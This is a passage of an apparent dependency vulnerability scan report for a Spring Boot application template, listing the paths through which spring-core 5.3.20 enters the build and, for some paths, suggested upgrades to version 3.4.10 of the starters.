  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
